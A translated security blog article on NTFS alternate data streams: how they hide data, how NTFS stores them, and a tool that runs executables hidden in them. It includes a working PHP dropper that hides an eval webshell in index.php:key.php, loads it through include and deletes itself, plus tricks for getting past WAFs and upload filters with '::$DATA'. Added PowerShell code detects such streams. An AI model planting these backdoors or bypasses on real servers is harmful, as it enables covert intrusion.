File Parasitism: The Road of No Return in Search of a Host (NTFS file streams in practice)

Source: Internet
Author: User

Let's take a look at NTFS file streams today:

The NTFS file system supports multiple data streams per file. By default a file's content lives in one unnamed stream; additional named streams can be created on the same file. Windows Explorer does not display named streams, yet a named stream is functionally the same as the default unnamed one: it can hold arbitrary data and can even be used to launch a program.

NTFS file stream generation steps:
1. Open a command prompt in any directory on an NTFS partition and run echo mstlab>>mst.txt:test.txt. A file named mst.txt appears in the current directory, but its size is 0 bytes and opening it shows nothing.


Only when you run notepad mst.txt:test.txt do you see the text mstlab that was written.


2. In the command above, mst.txt need not exist beforehand; it can also be an existing file of any format (.txt, .jpg, .exe, .asp and so on), and the name and extension after the colon (test.txt) are likewise arbitrary. Any text can therefore be hidden inside any file, and as long as the virtual file name after the colon (test.txt) is not disclosed, nobody else will see the hidden content at all.


3. A file that already carries hidden content can carry more. Continuing the example, echo mstlab1>>mst.txt:test1.txt creates a second named stream on mst.txt; notepad mst.txt:test1.txt shows mstlab1, while mstlab is still in mst.txt:test.txt, completely unaffected.

So the host mst.txt has been parasitized by test.txt and test1.txt, and the relationship is obvious: when the host disappears, the parasites disappear with it.
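The three steps above, redone in PowerShell so that each claim (0-byte host, invisible content, several streams side by side, what deleting the host does) can be checked rather than taken on faith. This is an added example, not code from the original article. It reuses the article's names mst.txt, test.txt and test1.txt, assumes the current directory is on an NTFS volume, and needs Windows PowerShell 3 or later on Windows (the -Stream parameters do not exist on other platforms).

```powershell
# Added example (not from the original article). Run from a directory on an NTFS volume.
$carrier = Join-Path (Get-Location) 'mst.txt'   # the "host"; name taken from the article

# Step 1 and 3: write two named streams. If mst.txt does not exist it is created empty,
# which is the same behaviour as echo mstlab>>mst.txt:test.txt in cmd.exe.
Set-Content -Path $carrier -Stream 'test.txt'  -Value 'mstlab'  -NoNewline
Set-Content -Path $carrier -Stream 'test1.txt' -Value 'mstlab1' -NoNewline

# The unnamed (default) stream is still empty, so Explorer, dir and Get-Item all report 0 bytes.
"Host size as reported by the directory listing: {0} bytes" -f (Get-Item $carrier).Length

# Enumerate every stream on the file. ':$DATA' is the unnamed default stream
# (the file's normal content); everything else is a "parasite".
Get-Item $carrier -Stream * | Select-Object Stream, Length

# Step 2 equivalent of "notepad mst.txt:test.txt": read one named stream back.
"test.txt  -> {0}" -f (Get-Content -Path $carrier -Stream 'test.txt')
"test1.txt -> {0}" -f (Get-Content -Path $carrier -Stream 'test1.txt')

# The same enumeration from cmd.exe: dir /r prints the streams under each file.
cmd /c 'dir /r mst.txt'

# Removing one stream leaves the other stream and the host untouched.
Remove-Item -Path $carrier -Stream 'test1.txt'
Get-Item $carrier -Stream * | Select-Object Stream, Length

# Deleting the host deletes every stream with it: the parasite cannot outlive the host.
Remove-Item $carrier
Test-Path $carrier   # False
```

Two practical caveats that follow from this: dir /r (and Sysinternals streams.exe) will show the hidden streams to anyone who looks, so "hidden" only means hidden from Explorer; and named streams are an NTFS property, so copying the host to a FAT/exFAT drive or into a zip archive silently drops them.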

NTFS features and principle analysis:
Feature 1:
Experiment tool download: https://github.com/wangyongxina/filestreams/blob/master/release/release.7z
Tool usage notes:
create      create a file stream
enum        enumerate file streams
delete      delete a file stream
write       write content to a file stream
append      append a file to a file stream
launch      execute the contents of a file stream
dump        read the contents of a file stream


Let's reset the earlier experiment and enumerate the streams of mst.txt again:




The default stream listed here confirms the opening sentence: a file's normal content is itself stored in a stream, the unnamed (default) one.


To begin the experiment, we first use FileStreams.exe to create a file stream named vkey:
FileStreams.exe create mst.txt vkey


Then write content into the stream vkey:

FileStreams.exe write mst.txt vkey content


View the contents of the stream vkey:

FileStreams.exe dump mst.txt vkey 14
The 14 is the number of bytes to read; it is the size of stream vkey after the previous write.


As said at the start, a file stream can also be used to launch a program. Let's try it:
1. Append a file to the stream vkey:
FileStreams.exe append mst.txt vkey C:\Users\gh0stkey\Desktop\test\FileStreams.exe



2. Look at the contents of the stream vkey, here the first 100 bytes:
FileStreams.exe dump mst.txt vkey 100



3. Execute the stream vkey with the tool's launch command:




The copy of C:\Users\gh0stkey\Desktop\test\FileStreams.exe stored in the stream runs without any problem.
Feature 2:
An empty host file is created automatically:


The host is created first and then parasitized.


Creating a stream on a file that does not yet exist automatically creates that file, empty.
Principle analysis:
Now that we have a first impression of how file streams behave, let's look at how NTFS implements them:


NTFS stores everything it knows about a file, such as its size, creation time, modification time, name and content, as attributes of that file. NTFS defines a series of attribute types for this purpose ($STANDARD_INFORMATION, $FILE_NAME, $DATA and others):





See the ntfs-3g documentation for the details. These attributes are laid out in the NTFS MFT (Master File Table), where each MFT record is 1024 bytes. The $DATA attribute in an MFT record is the file stream discussed above: a record that contains several $DATA attributes with different names is a file with more than one stream. Opening the MFT record of 1.txt in WinHex shows how NTFS actually organizes it:




You can see that the data of stream test2 is stored directly inside the MFT record (it is resident) because it is small, while the data of stream testexe is not visible there: it is large, so the record only holds the cluster information (the data runs) pointing to where the stream lives on disk (it is non-resident).


Use in penetration testing:

Hiding a webshell backdoor:

<?php
// Step 1: hide a one-line webshell in a named stream of index.php
exec('echo "<?php @eval($_POST[key]);?>" >> index.php:key.php');
// Step 2: write a.php, which pulls the stream in through include
$key = <<<key
echo "<?php include 'index.php:key.php';?>" >> a.php
key;
exec($key);
// Step 3: remove this dropper script itself
$url = $_SERVER['PHP_SELF'];
$filename = substr($url, strrpos($url, '/') + 1);
@unlink($filename);
?>

Why is it written this way? First, we know the default home page of the site is index.php, so the first piece of code:

exec('echo "<?php @eval($_POST[key]);?>" >> index.php:key.php');

writes a one-line webshell directly into the stream key.php of that file.


Second, a stream cannot be requested or executed directly through the web server, but PHP can read it with include, which gives the second piece of code:

$key = <<<key
echo "<?php include 'index.php:key.php';?>" >> a.php
key;
exec($key);


Finally, so that the dropper itself is not found, it deletes itself:


$url = $_SERVER['PHP_SELF'];
$filename = substr($url, strrpos($url, '/') + 1);
@unlink($filename);
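The defender's side of the trick above: a webshell in index.php:key.php is invisible to a scanner that only reads the default stream of each file, but the stream list of every file under the web root is one call away. This is an added example, not code from the original article; the web root path is an assumption, and the Zone.Identifier exclusion exists because browsers and Outlook attach that stream to every download, so it is noise rather than a finding.

```powershell
# Added example (not from the original article): list every named stream under a web root.
# Assumes Windows PowerShell 3+ on Windows; the root path is a placeholder.
function Find-NamedStreams {
    param(
        [Parameter(Mandatory)][string]$Root,
        # Streams that are normal on a Windows box and would drown out real findings.
        [string[]]$Ignore = @('Zone.Identifier')
    )
    Get-ChildItem -Path $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * returns one object per stream; ':$DATA' is the file's own content.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -notin $Ignore } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Bytes  = $_.Length
                        # First line of the stream, enough to spot "<?php" or an MZ header.
                        Head   = Get-Content -LiteralPath $file.FullName -Stream $_.Stream `
                                     -TotalCount 1 -ErrorAction SilentlyContinue
                    }
                }
        }
}

# Usage: review everything it prints; a stream on index.php whose head starts with <?php is the backdoor.
Find-NamedStreams -Root 'C:\inetpub\wwwroot' | Format-Table -AutoSize
```

For continuous monitoring rather than a one-off sweep, Sysmon logs the creation of named streams as event ID 15 (FileCreateStreamHash), which records the host file and a hash of the stream content at the moment the attacker's echo command runs.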


Hiding a software backdoor:
Using feature 1, write code that runs in the background and automatically launches the program stored in the stream.

Bypassing a WAF:
Tested against a few WAFs; the stream path still gets past them.
More techniques:

This requires a file-inclusion vulnerability.

Of course some restrictions keep the parasite from taking over. Use the default-stream substitution feature below to upload a file named 1.php: and bypass the extension restriction.

Of course you can also plant a persistent webshell backdoor and then include it:



Default stream substitution:

The default stream is the host itself; writing to it completely devours the host and takes its place.

A very interesting and unconventional trick.




For example, run echo xxxx>>1.txt directly:
Then replace the default stream (the unnamed stream is addressed as 1.txt::$DATA, so echo xxxx>>1.txt::$DATA writes to the file's own content):

Of course, if the host does not exist, writing to its default stream creates the host and devours it, thereby becoming the host.

This technique works perfectly where command execution is restricted.
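Why the default-stream notation defeats an extension check: the filter inspects the submitted name, but NTFS strips the ::$DATA suffix and creates the plain file. The example below, which is added here and is not code from the original article, puts a hypothetical weak filter (last dot-separated token against a blacklist) beside a hardened one, then lets cmd.exe create the file exactly as the article's echo>>1.txt::$DATA does. It assumes Windows PowerShell on an NTFS volume; the filter functions are stand-ins for whatever the upload handler would do, not a real product's code.

```powershell
# Added example (not from the original article). Windows, NTFS volume.

function Test-NaiveExtensionFilter {
    param([string]$Name)
    # Hypothetical weak filter: everything after the last dot, compared with a blacklist.
    # For '1.php::$DATA' that token is 'php::$DATA', which is not 'php', so it passes.
    $ext = $Name.Split('.')[-1].ToLower()
    return ($ext -notin @('php', 'asp', 'aspx', 'jsp'))
}

function Test-HardenedExtensionFilter {
    param([string]$Name)
    # Reject stream syntax and path separators outright, then allow only a whitelist.
    if ($Name -match '[:\\/]') { return $false }
    $ext = [System.IO.Path]::GetExtension($Name).ToLower()
    return ($ext -in @('.jpg', '.png', '.gif', '.txt'))
}

$dir = Join-Path $env:TEMP 'ads-demo'          # scratch directory, an assumption
New-Item -ItemType Directory -Force -Path $dir | Out-Null
Set-Location $dir

foreach ($requested in @('1.php', '1.php::$DATA')) {
    $naive = Test-NaiveExtensionFilter $requested
    $hard  = Test-HardenedExtensionFilter $requested
    "{0,-13} naive filter: {1,-5} hardened filter: {2}" -f $requested, $naive, $hard
    if ($naive) {
        # What the upload handler would do next: write the content under the submitted name.
        # ::$DATA names the unnamed stream, so NTFS creates plain 1.php with this content.
        cmd /c "echo ads-bypass-demo>>$requested"
    }
}

# Only '1.php::$DATA' passed the naive filter, and the file that now exists is '1.php'.
Get-ChildItem $dir | Select-Object Name, Length
```

The hardened variant rejects the colon instead of trying to normalise it, because NTFS also accepts names like 1.php:anything and 1.php: that a normaliser would have to know about; refusing the character is simpler and safer than chasing every spelling.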

Summary:
Original file = host, file stream = parasite. Readers can build on this article to dig deeper and apply file streams to all kinds of operations, creating their own "sneaky" stream.

